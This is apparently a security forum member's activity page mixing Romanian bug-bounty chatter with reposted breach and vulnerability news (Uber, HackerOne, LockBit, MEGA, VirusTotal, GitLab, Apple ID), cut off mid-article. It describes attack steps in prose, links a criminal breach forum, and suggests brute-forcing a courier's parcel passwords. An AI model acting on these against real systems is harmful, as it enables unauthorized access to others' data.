Jump to content

akkiliON

Active Members
  • Posts

    1147
  • Joined

  • Last visited

  • Days Won

    26

akkiliON last won the day on October 3

akkiliON had the most liked content!

Reputation

581 Excellent

2 Followers

About akkiliON

  • Rank
    Retired
    Contributor
  • Birthday 01/01/1970

Recent Profile Visitors

5699 profile views
  1. Vulnerabilitatea din [*].live.com. Azi am primit mesaj. Nu ma asteptam asa repede la un raspuns. 🙂 L.E: Au si reparat-o... LOL. Am verificat acum 😅
  2. O sa revin cu un mesaj cand primesc vreo noutate.... O sa dureze sigur ceva timp.... Mersi ! Asta l-am gasit si eu si am vrut sa il raportez pentru HoF macar. Daca l-ai gasit si tu si ti-au zis ca e out-of-scope.... nu mai are rost.... 😅 Ma nO_Ob, pe tine cine te-o pus sa stai... treci la munci 😂
  3. Salut. Am gasit doua vulnerabilitati XSS in aplicatiile detinute de cei de la Microsoft. Una este in Outlook, iar a doua intr-o alta aplicatie folosita si cunoscuta de multi... nu pot da detalii momentan deoarece nu a fost rezolvata nici una pana acum... Cel putin, nu am primit duplicat pe rapoartele trimise. 🙂 1. XSS reflected (without user interaction) - [*].live.com: 2. XSS reflected (user interaction required) - Outlook: Am observat ca si domeniile acestea sunt vulnerabile: office365.com si live.com.
  4. Ride hailing giant Uber disclosed Thursday it's responding to a cybersecurity incident involving a breach of its network and that it's in touch with law enforcement authorities. The New York Times first reported the incident. The company pointed to its tweeted statement when asked for comment on the matter. The hack is said to have forced the company to take its internal communications and engineering systems offline as it investigated the extent of the breach. The publication said the malicious intruder compromised an employee's Slack account, and leveraged it to broadcast a message that the company had "suffered a data breach," in addition to listing internal databases that's supposed to have been compromised. "It appeared that the hacker was later able to gain access to other internal systems, posting an explicit photo on an internal information page for employees," the New York Times said. Uber has yet to offer additional details about the incident, but it seems that the hacker, believed to be an 18-year-old teenager, social-engineered the employee to get hold of their password by masquerading as a corporate IT person and used it to obtain a foothold into the internal network. "Once on the internal network, the attackers found high privileged credentials laying on a network file share and used them to access everything, including production systems, corp EDR console, [and] Uber slack management interface," Kevin Reed, chief information security officer at Acronis, told The Hacker News. This is not Uber's first breach. It came under scrutiny for failing to properly disclose a 2016 data breach affecting 57 million riders and drivers, and ultimately paying off the hackers $100,000 to hide the breach. It became public knowledge only in late 2017. Federal prosecutors in the U.S. have since charged its former security officer, Joe Sullivan, with an alleged attempted cover-up of the incident, stating he had "instructed his team to keep knowledge of the 2016 breach tightly controlled." Sullivan has contested the accusations. In December 2021, Sullivan was handed down additional three counts of wire fraud to previously filed felony obstruction and misprision charges. "Sullivan allegedly orchestrated the disbursement of a six-figure payment to two hackers in exchange for their silence about the hack," the superseding indictment said. It further said he "took deliberate steps to prevent persons whose PII was stolen from discovering that the hack had occurred and took steps to conceal, deflect, and mislead the U.S. Federal Trade Commission (FTC) about the data breach." The latest breach also comes as the criminal case against Sullivan went to trial in the U.S. District Court in San Francisco. "The compromise is certainly bigger compared to the breach in 2016," Reed said. "Whatever data Uber keeps, the hackers most probably already have access." Source: https://thehackernews.com/2022/09/uber-says-its-investigating-potential.html
  5. Company says it is making changes to its security controls to prevent malicious insiders from doing the same thing in future; reassures bug hunters their bounties are safe. HackerOne has fired one of its employees for collecting bug bounties from its customers after alerting them to vulnerabilities in their products — bugs that had been found by other researchers and disclosed privately to HackerOne via its coordinated vulnerability disclosure program. HackerOne discovered the caper when one of its customers asked the organization to investigate a vulnerability disclosure that was made outside the HackerOne platform in June. The customer, like other clients of bug bounty programs, uses HackerOne to collect and report vulnerabilities in its products that independent security researchers might have discovered. In return, the company pays a reward — or bug bounty — for reported vulnerabilities. In this instance, the HackerOne customer said an anonymous individual had contacted them about a vulnerability that was very similar to another bug in its technology that a researcher had previously submitted via the HackerOne platform. Bug collisions — where two or more researchers might independently unearth the same vulnerability — are not uncommon. "However, this customer expressed skepticism that this was a genuine collision and provided detailed reasoning," HackerOne said in a report summarizing the incident. The customer described the individual — who used the handle "rzlr" — as using intimidating language in communicating information about the vulnerability, HackerOne said. Malicious Insider The company's investigation of the June 22, 2022, tip almost immediately pointed to multiple customers likely being contacted in the same manner. HackerOne researchers began probing every scenario where someone might have gained access to its vulnerability disclosure data: whether someone might have compromised one of its systems, gained remote access some other way, or if the disclosure had resulted from a misconfiguration. The data quickly pointed to the threat actor being an insider with access to the vulnerability data. HackerOne's investigators then looked at their log data on employee access to vulnerability disclosures and found that just one employee had accessed each of the disclosures that customers reported as being suspicious. "Within 24 hours of the tip from our customer, we took steps to terminate that employee's system access and remotely locked their laptop pending further investigation," HackerOne said. The company found the former employee had created a fictitious HackerOne account and collected bounties for a handful of disclosures. HackerOne worked with the relevant payment providers in each instance to confirm the bounties were paid into a bank account connected with the now-former employee. By analyzing the individual's network traffic, the investigators were also able to link the fictitious account to the ex-employee's primary HackerOne account. Undermining Trust Mike Parkin, senior technical engineer at Vulcan Cyber, says incidents like this can undermine the trust that is key to the success of crowdsourced vulnerability disclosure programs such as the one that HackerOne manages. "Trust is a big factor in vulnerability research and can play a large part in many bug bounty programs," Parkin says. "So, when someone effectively steals another researcher's work and presents it as their own, that foundational trust can be stretched." Parkin praised HackerOne for being transparent and acting quickly to address the situation. "Hopefully this incident won't affect the vulnerability research ecosystem overall, but it may lead to deeper reviews of bug bounty submissions going forward," he says. HackerOne said the former employee — who started only on April 4 — directly communicated with a total of seven of its customers. It urged any other customers that might have been contacted by an individual using the handle rzlr to contact the company immediately, especially if the communication had been aggressive or threatening in tone. The company also reassured hackers who have signed up for the platform that their eligibility for any bounties they might receive for vulnerability disclosures had not been adversely impacted. "All disclosures made from the threat actor were considered duplicates. Bounties applied to these submissions did not impact the original submissions." HackerOne said it would contact hackers whose reports the ex-employee might have accessed and attempted to resubmit. "Since the founding of HackerOne, we have honored our steadfast commitment to disclosing security incidents because we believe that sharing security information is essential to building a safer Internet," the company said. Following the incident, HackerOne has identified several areas where it plans to bolster controls. These include improvements to its logging capabilities, adding employees to monitor for insider threats, enhancing its employee screening practices during the hiring process, and controls for isolating data to limit damage from incidents of this type. Jonathan Knudsen, head of global research at Synopsys Cybersecurity Research Center, says HackerOne's decision to communicate clearly about the incident and its response to it is an example of how organizations can limit damage. "Security incidents are often viewed as embarrassing and irredeemable," he says. But being completely transparent about what happened can increase credibility and garner respect from customers. "HackerOne has taken an insider threat incident and responded in a way that reassures customers that they take security very seriously, are capable of responding quickly and effectively, and are continuously examining and improving their processes," Knudsen says. Source: https://www.darkreading.com/vulnerabilities-threats/hackerone-employee-fired-for-stealing-and-selling-bug-reports-for-personal-gain
  6. The LockBit 3.0 ransomware operation was launched recently and it includes a bug bounty program offering up to $1 million for vulnerabilities and various other types of information. LockBit has been around since 2019 and the LockBit 2.0 ransomware-as-a-service operation emerged in June 2021. It has been one of the most active ransomware operations, accounting for nearly half of all ransomware attacks in 2022, with more than 800 victims being named on the LockBit 2.0 leak website. The cybercriminals are encrypting files on compromised systems and also stealing potentially valuable information that they threaten to make public if the victim refuses to pay up. With the launch of LockBit 3.0, it seems they are reinvesting some of the profit in their own security via a “bug bounty program”. Similar to how legitimate companies reward researchers to help them improve their security, LockBit operators claim they are prepared to pay out between $1,000 and $1 million to security researchers and ethical or unethical hackers. Rewards can be earned for website vulnerabilities, flaws in the ransomware encryption process, vulnerabilities in the Tox messaging app, and vulnerabilities exposing their Tor infrastructure. They are also prepared to reward “brilliant ideas” on how to improve their site and software, as well as information on competitors. Addressing these types of security holes can help protect the cybercrime operation against researchers and law enforcement. One million dollars are offered to anyone who can dox — find the real identity — of a LockBit manager known as “LockBitSupp”, who is described as the “affiliate program boss”. This bounty has been offered since at least March 2022. Major ransomware groups are believed to have made hundreds of millions and even billions of dollars, which means the LockBit group could have the funds needed for such a bug bounty program. “With the fall of the Conti ransomware group, LockBit has positioned itself as the top ransomware group operating today based on its volume of attacks in recent months. The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top,” commented Satnam Narang, senior staff research engineer at Tenable. However, John Bambenek, principal threat hunter at security and operations analytics SaaS company Netenrich, said he doubts the bug bounty program will get many takers. “I know that if I find a vulnerability, I’m using it to put them in prison. If a criminal finds one, it’ll be to steal from them because there is no honor among ransomware operators,” Bambenek said. Casey Ellis, founder and CTO of bug bounty platform Bugcrowd, noted that “the same way hackers aren't always ‘bad’, the bounty model isn't necessarily ‘only useful for good’.” Ellis also pointed out, “Since Lockbit 3.0's bug bounty program essentially invites people to add a felony in exchange for a reward, they may end up finding that the $1,000 low reward is a little light given the risks involved for those who might decide to help them.” Other new features introduced with the launch of LockBit 3.0 include allowing victims to buy more time or “destroy all information”. The cybercriminals are also offering anyone the option to download all files stolen from a victim. Each of these options has a certain price. Vx-underground, a service that provides malware samples and other resources, also noted that the harassment of victims is now also encouraged. South Korean cybersecurity firm AhnLab reported last week that the LockBit ransomware has been distributed via malicious emails claiming to deliver copyright claims. “Lures like this one are simple and effective, although certainly not unique,” said Erich Kron, security awareness advocate at KnowBe4. “Like so many other phishing attacks, this is using our emotions, specifically the fear of a copyright violation, which many people have heard can be very costly, to get a person to make a knee-jerk reaction.” Source: https://www.securityweek.com/lockbit-30-ransomware-emerges-bug-bounty-program
  7. MEGA is a leading cloud storage platform with more than 250 million users and 1000 Petabytes of stored data, which aims to achieve user-controlled end-to-end encryption. We show that MEGA's system does not protect its users against a malicious server and present five distinct attacks, which together allow for a full compromise of the confidentiality of user files. Additionally, the integrity of user data is damaged to the extent that an attacker can insert malicious files of their choice which pass all authenticity checks of the client. We built proof-of-concept versions of all the attacks, showcasing their practicality and exploitability. Background MEGA is a cloud storage and collaboration platform founded in 2013 offering secure storage and communication services. With over 250 million registered users, 10 million daily active users and 1000 PB of stored data, MEGA is a significant player in the consumer domain. What sets them apart from their competitors such as DropBox, Google Drive, iCloud and Microsoft OneDrive is the claimed security guarantees: MEGA advertise themselves as the privacy company and promise User-Controlled end-to-end Encryption (UCE). We challenge these security claims and show that an adversarial service provider, or anyone controlling MEGA’s core infrastructure, can break the confidentiality and integrity of user data. Key Hierarchy At the root of a MEGA client’s key hierarchy, illustrated in the figure below, is the password chosen by the user. From this password, the MEGA client derives an authentication key and an encryption key. The authentication key is used to identify users to MEGA. The encryption key encrypts a randomly generated master key, which in turn encrypts other key material of the user. For every account, this key material includes a set of asymmetric keys consisting of an RSA key pair (for sharing data with other users), a Curve25519 key pair (for exchanging chat keys for MEGA’s chat functionality), and a Ed25519 key pair (for signing the other keys). Furthermore, for every file or folder uploaded by the user, a new symmetric encryption key called a node key is generated. The private asymmetric keys and the node keys are encrypted by the client with the master key using AES-ECB and stored on MEGA’s servers to support access from multiple devices. A user on a new device can enter their password, authenticate to MEGA, fetch the encrypted key material, and decrypt it with the encryption key derived from the password. Attacks RSA Key Recovery Attack MEGA can recover a user's RSA private key by maliciously tampering with 512 login attempts. Plaintext Recovery MEGA can decrypt other key material, such as node keys, and use them to decrypt all user communication and files. Framing Attack MEGA can insert arbitrary files into the user's file storage which are indistinguishable from genuinely uploaded ones. Integrity Attack The impact of this attack is the same as that of the framing attack, trading off less stealthiness for easier pre-requisites. GaP-Bleichenbacher Attack MEGA can decrypt RSA ciphertexts using an expensive padding oracle attack. RSA Key Recovery Attack MEGA uses RSA encryption for sharing node keys between users, to exchange a session ID with the user at login and in a legacy key transfer for the MEGA chat. Each user has a public RSA key pksharepkshare used by other users or MEGA to encrypt data for the owner, and a private key skshareskshare used by the user themselves to decrypt data shared with them. The private RSA key is stored for the user in encrypted form on MEGA’s servers. Key recovery means that an attacker successfully gets possession of the private key of a user, allowing them to decrypt ciphertexts intended for the user. We discovered a practical attack to recover a user’s RSA private key by exploiting the lack of integrity protection of the encrypted keys stored for users on MEGA’s servers. An entity controlling MEGA’s core infrastructure can tamper with the encrypted RSA private key and deceive the client into leaking information about one of the prime factors of the RSA modulus during the session ID exchange. More specifically, the session ID that the client decrypts with the mauled private key and sends to the server will reveal whether the prime is smaller or greater than an adversarially chosen value. This information enables a binary search for the prime factor, with one comparison per client login attempt, allowing the adversary to recover the private RSA key after 1023 client logins. Using lattice cryptanalysis, the number of login attempts required for the attack can be reduced to 512. Proof of Concept Attack Since the server code is not published, we cannot implement a Proof-of-Concept (PoC) in which the adversary actually controls MEGA. Instead, we implemented a MitM attack by installing a bogus TLS root certificate on the victim. This setup allows the attacker to impersonate MEGA towards the user while using the real servers to execute the server code (which is unknown to us). Server responses can be patched on the fly since they do not rely on secrets stored by the server, allowing the attack to be performed in real time as the victim interacts with MEGA. The following video shows how our attack recovers the first byte of the RSA private key. Afterward, we abort the attack to avoid any adverse impact on MEGA’s production servers. For each recovered bit, the attack consists of the following steps: The victim logs in. The adversary hijacks the login and replaces the correct session ID with their probe for the next secret bit. Based on the client’s response, the adversary updates its interval for the binary search of the RSA prime factor. The login fails for the victim. This is only a limitation of the MitM setup, since the correct SID is lost. An adversarial cloud storage provider can simply accept the returned SID. Note that after aborting the attack, the search interval is [0xe03ff...f, 0xe07ff...f]. The secret prime factor qq of the RSA modulus starts with 0xe06.... This value is within the search interval and the adversary already recovered the first byte 0xe0. Using all of qq, the adversary can recover the RSA private key (d,N)(d,N) using the public key (e,N)(e,N) as p=N/qp=N/q and d=e−1mod(p−1)(q−1)d=e−1mod(p−1)(q−1). Video: https://mega-awry.io/videos/rsa_key_recovery_poc.mp4 Plaintext Recovery As shown in the key hierarchy MEGA clients encrypt the private keys for sharing, chat key transfer, and signing with the master key using AES-ECB. Furthermore, file and folder keys also use the same encryption. A plaintext recovery attack lets the adversary compute the plaintext from a given ciphertext. In this specific attack, MEGA can decrypt AES-ECB ciphertexts created with a user’s master key. This gives the attacker access to the aforementioned and highly sensitive key material encrypted in this way. With the sharing, chat, signing, and node keys of a user, the adversary can decrypt the victim’s data or impersonate them. This attack exploits the lack of key separation for the master key and knowledge of the recovered RSA private key (e.g., from the RSA key recovery attack). The decryption oracle again arises during authentication, when the encrypted RSA private key and the session ID (SID), encrypted with the RSA public key, is sent from MEGA’s servers to the user. MEGA can overwrite part of the RSA private key ciphertext in the SID exchange with two target ciphertext blocks. It then uses the SID returned by the client to recover the plaintext for the two target blocks. Since all key material is protected with AES-ECB under the master key, an attacker exploiting this vulnerability can decrypt node keys, the victim’s Ed25519 signature key, its Curve25519 chat key, and, thus, also all exchanged chat keys. Given that the private RSA key has been recovered, one client login suffices to recover 32 bytes of encrypted key material, corresponding, for instance, to one full node key. Framing Attack This attack allows MEGA to forge data in the name of the victim and place it in the target’s cloud storage. While the previous attacks already allow an adversary to modify existing files using the compromised keys, this attack allows the adversary to preserve existing files or add more documents than the user currently stores. For instance, a conceivable attack might frame someone as a whistle-blower and place an extensive collection of internal documents in the victim’s cloud storage. Such an attack might gain credibility when it preserves the user’s original cloud content. To create a new file key, the attacker makes use of the particular format that MEGA uses for node keys. Before they are encrypted, node keys are encoded into a so called obfuscated key object, which consists of a reversible combination of the node key and information used for decryption of the file or folder. (Specifically, a nonce and a truncated MAC tag.) Since none of our attacks allow an attacker to encrypt values of their choosing with AES-ECB under the master key, the attacker works in the reverse direction to create a new valid obfuscated key object. That is, it first obtains an obfuscated key by decrypting a randomly sampled key ciphertext using the plaintext recovery attack. Note that this ciphertext can really be randomly sampled from the set of all bit strings of the length of one encrypted obfuscated key object. Decryption will always succeed, since the AES-ECB encryption mode used to encrypt key material does not provide any means of checking the integrity of a ciphertext. The resulting string is not under the control of the adversary and will be random-looking, but can regardless be used as a valid obfuscated key object since both file keys and the integrity information (nonces and MAC tags) can be arbitrary strings. Hence, the adversary parses the decrypted string into a file key, a nonce and MAC tag. It then modifies the target file which is to be inserted into the victim’s cloud such that it passes the integrity check when the file key and integrity information from the obfuscated key is used. The attacker achieves this by inserting a single AES block in the file at a chosen location. Finally, the adversary uses the known file key to encrypt the file and uploads the result to the victim’s cloud. Many standard file formats such as PNG and PDF tolerate 128 injected bits (for instance, in the file’s metadata, as trailing data, or in unused structural components) without affecting the displayed content. The image above shows the file our proof of concept inserts in the victim account. Our attack added the highlighted bytes to satisfy the integrity check. Due to the structure of PNG files, these bytes do not change the displayed pixels, i.e., it is visually identical to the unmodified image. Proof-of-Concept Attack The PoC shows our framing attack in the MitM setting described in the RSA private key recovery attack. The video shows the following steps: The victim logs into their account without any attack running. There are only three files in the cloud storage and none of them is called hacker-cat.png. The victim logs out and the adversary runs the plaintext recovery attack once. This involves the following steps: The adversary hijacks the victim’s login attempt and replaces the encrypted SID with the encrypted key that it picked for the file forgery. The victim’s client responds with the decrypted SID, from which the adversary can recover the plaintext for the injected ciphertext blocks. The log in attempt fails, which is only a limitation of the MitM setting. A malicious cloud provider can perform this attack without the user noticing. The adversary uses the key recovered in the previous step to forge an encrypted file. The victim logs in again. The adversary injects the forged file into the loaded file tree. The victim’s cloud now displays four files, including a new file called hacker-cat.png. When the user views this file in the browser, it correctly decrypts and shows the image. Video: https://mega-awry.io/videos/framing_attack_poc.mp4 Integrity Attack This attack exploits the peculiar structure of MEGA’s obfuscated key objects to manipulate an encrypted node key such that the decrypted key consists of all zero bytes. Since the attacker now knows the key, this key manipulation can be used to forge a file in a manner similar to the framing attack. Unlike for the framing attack (which requires the ability to decrypt arbitrary AES-ECB ciphertexts), for this attack the adversary only needs access to a single plaintext block and the corresponding ciphertext encrypted with AES-ECB under the master key. For instance, the attacker can use MEGA’s protocol for public file sharing to obtain the pair: when a user shares a file or folder publicly, they create a link containing the obfuscated key in plaintext. Hence, a malicious cloud provider who obtains such a link knows both the plaintext and the corresponding ciphertext for the node key, since the latter is uploaded to MEGA when the file was created (before being shared). This can then be used as the starting point for the key manipulation and allows a forged file ciphertext to be uploaded into the victim’s cloud, just as for the framing attack. However, this attack is less surreptitious than the framing attack because of the low probability of the all-zero key appearing in an honest execution, meaning that an observant user who inspects the file keys stored in their account could notice that the attack has been performed. GaP-Bleichenbacher Attack This attack is a novel variant of Bleichenbacher’s attack on PKCS#1 v1.5 padding. We call it a Guess-and-Purge (GaP) Bleichenbacher attack. MEGA can use this attack to decrypt RSA ciphertexts by exploiting a padding oracle in the fallback chat key exchange of MEGA’s chat functionality. The vulnerable RSA encryption is used for sharing node keys between users, to exchange a session ID with the user at login and in a legacy key transfer for the MEGA chat. As shown in the key hierarchy, each user has a public RSA key used by other users or MEGA to encrypt data for the owner, and a private key used by the user themselves to decrypt data shared with them. With this attack, MEGA can decrypt these RSA ciphertexts, albeit requiring an impractical number of login attempts. Attack idea: The original Bleichenbacher attack maintains an interval for the possible plaintext value of a target ciphertext. It exploits the malleability of RSA to test the decryption of multiples of the unknown target message. Successful unpadding leaks the prefix of the decrypted message due to the structure of the PKCS#1 v1.5 padding. This prefix allows an adversary to reduce intervals efficiently and recover the plaintext. MEGA uses a custom padding scheme which is less rigid than PKCS#1 v1.5. This makes it challenging to apply Bleichenbacher’s attack, because a successful unpadding no longer corresponds to a single solution interval. Instead many disjoint intervals are possible, depending on the value of an unknown prefix in MEGA’s padding scheme. Our attack devices a new Guess-and-Purge strategy that guesses the unknown prefix and quickly purges wrong guesses. This enables us to perform a search for the decryption of a ciphertext in 216.9216.9 client login attempts on average. Although this attack is weaker than the RSA key recovery attack (in the sense that a key recovery implies plaintext recovery), it is complementary in the vulnerabilities that it exploits and requires different attacker capabilities. It attacks the legacy chat key decryption of RSA encryption instead of the session ID exchange and can be performed by a slightly weaker adversary since no key-overwriting is necessary. The details of the GaP-Bleichenbacher attack are intricate. For a full description, see Appendix B of the paper. Sources: https://mega-awry.io/ https://thehackernews.com/2022/06/researchers-uncover-ways-to-break.html https://blog.mega.io/mega-security-update/
  8. Despite the old saying, not everything lives forever on the internet — including stolen crypto. This week, crypto security firm BlockSec announced that a hacker figured out how to exploit lending agreements and triple their crypto reward on the ZEED DeFi protocol, which runs on the Binance Smart Chain and trades with a currency called YEED. “Our system detected an attack transaction that exploited the reward distribution vulnerability in ZEED,” BlockSec said on Twitter this week. The end of the thread threw readers for a loop, though, because BlockSec also said the stolen currency had been permanently lost because of a self-destruct feature the hacker used. “Interestingly, the attacker does not transfer the obtained tokens out before self-destructing the attack contract. Probably, he/she was too excited,” BlockSec said in a following tweet. Possible Vigilante The sheer thought of losing a million dollars is enough to make anybody sweat bullets, but it’s possible the hacker did this on purpose. BlockSec isn’t sure what the motive was, and suggests it could’ve been an accident. A report by VICE published this week says the hacker could’ve been a vigilante with a message or something to prove. Because the self-destruct feature “burned” the tokens, they’re essentially gone forever. VICE suggests the hacker could’ve wanted to watch the crypto world burn — and the mysterious attacker certainly did cause a lot of chaos. After selling the hacked tokens, YEED’s value crashed to near zero. Sales won’t resume until ZEED takes steps to secure, repair and test its systems. Maybe the hacker messed up, or maybe we just witnessed a modern day Robin Hood attack. It’s possible we’ll never know who pulled off the hack, or why. Source: https://futurism.com/the-byte/hacker-steals-destroys Dorele, ce făcuși..... 😂
  9. A security vulnerability has been disclosed in the web version of the Ever Surf wallet that, if successfully weaponized, could allow an attacker to gain full control over a victim's wallet. "By exploiting the vulnerability, it's possible to decrypt the private keys and seed phrases that are stored in the browser's local storage," Israeli cybersecurity company Check Point said in a report shared with The Hacker News. "In other words, attackers could gain full control over the victim's wallets." Ever Surf is a cryptocurrency wallet for the Everscale (formerly FreeTON) blockchain that also doubles up as a cross-platform messenger and allows users to access decentralized apps as well as send and receive non-fungible tokens (NFTs). It's said to have an estimated 669,700 accounts across the world. By means of different attack vectors like malicious browser extensions or phishing links, the flaw makes it possible to obtain a wallet's encrypted keys and seed phrases that are stored in the browser's local storage, which can then be trivially brute-forced to siphon funds. Given that the information in the local storage is unencrypted, it could be accessed by rogue browser add-ons or information-stealing malware that's capable of harvesting such data from different web browsers. Following responsible disclosure, a new desktop app has been released to replace the vulnerable web version, with the latter now marked as deprecated and used only for development purposes. "Having the keys means full control over the victim's wallet, and, therefore funds," Check Point's Alexander Chailytko said. "When working with cryptocurrencies, you always need to be careful, ensure your device is free of malware, do not open suspicious links, keep OS and anti-virus software updated." "Despite the fact that the vulnerability we found has been patched in the new desktop version of the Ever Surf wallet, users may encounter other threats such as vulnerabilities in decentralized applications, or general threats like fraud, [and] phishing." Source: https://thehackernews.com/2022/04/critical-bug-in-everscale-wallet.html
  10. After a deep security research by Cysource research team led by Shai Alfasi & Marlon Fabiano da Silva, we found a way to execute commands remotely within VirusTotal platform and gain access to its various scans capabilities. About virustotal: The virustotal.com application has more than 70 antivirus scanners that scan files and URLs sent by users. The original idea of the exploration was to use the CVE-2021-22204 so that these scanners would execute the payload as soon as the exiftool was executed. Technical part: The first step was uploading a djvu file to the page https://www.virustotal.com/gui/ with the payload: Virustotal.com analyzed my file and none of the antiviruses detected the payload added to the file's metadata. According to the documentation at the link: https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works , virustotal.com uses several scans. The application sent our file with the payload to several hosts to perform the scan. On virustotal hosts, at the time that exiftool is executed, according to CVE-2021-22204 inform, instead of exiftool detecting the metadata of the file it executes our payload. Handing us a reverse shell on our machine. After that we noticed that it’s not just a Google-controlled environment, but environments related to internal scanners and partners that assist in the virustotal project. In the tests it was possible to gain access to more than 50 internal hosts with high privileges. Hosts identified within the internal network: The interesting part is every time we uploaded a file with a new hash containing a new payload, virustotal forwarded the payload to other hosts. So, not just we had a RCE, but also it was forwarded by Google's servers to Google's internal network, it customers and partners. Various types of services were found within the networks, such as: mysql, Kubernetes, oracle database, http and https applications, metrics applications, SSH, etc. Due to this unauthorized access, it was possible to obtain sensitive and critical information such as: Kubernetes tokens and certificates, service settings info, source codes, Logs, etc. We reported all the findings to Google that fixed this issue quickly. Disclosure Process: Report received by GoogleVRP - 04.30.2021 GoogleVRP trigged the report - 05.19.2021 GoogleVRP accepted the report as a valid report - 21.05.2021 GoogleVRP closed the report - 04.06.2021 Virustotal was no longer vulnerable - 13.01.2022 GoogleVRP allowed publishing - 15.01.2022 Source: https://www.cysrc.com/blog/virus-total-blog
  11. Hackers: https://breached.co/index.php ---------------------------------------------
  12. akkiliON

    Gls.ro IDOR

    Da-le un e-mail daca vrei si vezi ce iti spun. Cred ca poti sa le trimiti un mesaj aici: https://gls-group.eu/GROUP/en/gls_informs/safety_advice_1606mmeaxqozb E-mail: security@gls-group.eu Eu din ce imi amintesc, am raportat acum cativa ani o vulnerabilitate la Canon si au fixat problema... n-am primit nici un raspuns de la ei sau sa spuna multumesc macar. 🙃 Chiar am de primit un colet de la ei astazi 😅.... cum a spus @SirGod, parola este din 4 caractere.... asta am observat si eu in SMS-ul pe care l-am primit..... Vezi daca merge brute-force attack.... eu nu am testat. EDIT: Defapt, parola pe care am primit-o eu este din 5 caractere.... my bad. 😄
  13. A now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, rendering a large number of internet-facing GitLab instances susceptible to attacks. Tracked as CVE-2021-22205, the issue relates to an improper validation of user-provided images that results in arbitrary code execution. The vulnerability, which affects all versions starting from 11.9, has since been addressed by GitLab on April 14, 2021 in versions 13.8.8, 13.9.6, and 13.10.3. In one of the real-world attacks detailed by HN Security last month, two user accounts with admin privileges were registered on a publicly-accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload "image," leading to remote execution of commands that granted the rogue accounts elevated permissions. Although the flaw was initially deemed to be a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021 owing to the fact that it can be triggered by unauthenticated threat actors as well. "Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders," cybersecurity firm Rapid7 said in an alert published Monday. Despite the public availability of the patches for more than six months, of the 60,000 internet-facing GitLab installations, only 21% of the instances are said to be fully patched against the issue, with another 50% still vulnerable to RCE attacks. In the light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible. "In addition, ideally, GitLab should not be an internet facing service," the researchers said. "If you need to access your GitLab from the internet, consider placing it behind a VPN." Additional technical analysis related to the vulnerability can be accessed here. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Source: https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html
  14. Everyone knows what’s inside a computer isn’t really real. It pretends to be, sure, hiding just under the pixels — but I promise you it isn’t. In the real world, everything has a certain mooring we’re all attuned to. You put money in a big strong safe, and, most likely if somehow it opens there will be a big sound, and a big hole. Everything has a footprint, everything has a size, there are always side-effects. As the electrons wiggle, they’re expressing all these abstract ideas someone thought up sometime. Someone had an idea of how they’d dance, but that’s not always true. Instead, there are half-formed ideas, ideas that change context and meaning when exposed to others, and ideas that never really quite made sense. The Alice in Wonderland secret of computers is that the dancers and their music are really the same. It’s easy to mistakenly believe that each word I type is shuffled by our pixie friends along predefined chutes and conveyors to make what we see on screen, when in reality each letter is just a few blits and bloops away from being something else entirely. Sometimes, if you’re careful, you can make all those little blits and bloops line up in a way that makes the dance change, and that’s why I’ve always loved hacking computers: all those little pieces that were never meant to be put together that way align in unintended but beautiful order. Each individual idea unwittingly becomes part of a greater and irrefutable whole. Before the pandemic, I spent a lot of time researching the way web of YouTube, Wikipedia and Twitter meets the other world of Word, Photoshop and Excel to produce Discord, 1Password, Spotify, iTunes, Battle.net and Slack. Here all the wonderful and admittedly very pointy and sharp benefits of the web meet the somewhat softer underbelly of the ‘Desktop Application’, the consequences of which I summarised one sunny day in Miami. I’m not really a very good security researcher, so little of my work sees the light of day because the words don’t always form up in the right order, but my experience then filled me with excitement to publish more. And so, sitting again under the fronds of that tumtum tree, I found more — and I promise you what I found then was as exciting as what I’ll tell you about now. But I can’t tell you about those. Perhaps naïve, it didn’t occur to me before that the money companies give you for your security research is hush money, but I know that now — and I knew that then, when I set out to hack Apple ID. At the time, Apple didn’t have any formal way of paying you for bugs: you just emailed them, and hoped for the best. Maybe you’d get something, maybe you wouldn’t — but there is certainly nothing legally binding about sending an email in the way submitting a report to HackerOne is. That appealed to me. Part 1: The Doorman’s Secret Computer systems don’t tend to just trust each other, especially on the web. The times they do usually end up being mistakes. Let me ask you this: when you sign into Google, do you expect it to know what you watched on Netflix? Of course not. That’s down to a basic rule of the web: different websites don’t default to sharing information to each other. ICloud, then is a bit of a curiosity. It has its own domain, icloud.com, entirely separate from Apple’s usual apple.com yet its core feature is of course logging into your Apple iCloud account. More interestingly still, you might notice that most login systems for, say, Google, redirect you through a common login domain like accounts.google.com, but iCloud’s doesn’t. Behind the looking-glass, Apple has made this work by having iCloud include a webpage that is located on the AppleID server, idmsa.apple.com. The page is located at this address: https://idmsa.apple.com/appleauth/auth/authorize/signin?frame_id=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&language=en_US&iframeId=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&client_id=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d&redirect_uri=https://www.icloud.com&response_type=code&response_mode=web_message&state=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&authVersion=latest Here, Apple is using OAuth 2, a capability based authentication framework. ‘Capability based’ is key here, because it means that a login from Apple.com doesn’t necessarily equate to one from iCloud.com, and also not all iCloud logins are necessarily the same either — that’s how Find My manages to skip a second-factor check to find your phone. This allows Apple to (to some extent) reduce the blast radius of security issues that might otherwise touch iCloud. This is modified, however, to allow the login to work embedded in another page. response_mode=web_message seems to be a switch that turns this on. If you visit the address, you’ll notice the page is just blank. This is for good reason: if anyone could just show the Apple iCloud login page then you could play around with the presentation of the login page to steal Apple user data (‘Redress Attack’). Apple’s code is detecting that it’s not being put in the right place and blanks out the page. In typical OAuth, the ‘redirect_uri’ specifies where the access is being sent to; in a normal, secure form, the redirect uri gets checked against what’s registered for the other, ‘client_id’ parameter to make sure that it’s safe for Apple to send the special keys that grant access there — but here, there’s no redirect that would cause that. In this case the redirect_uri 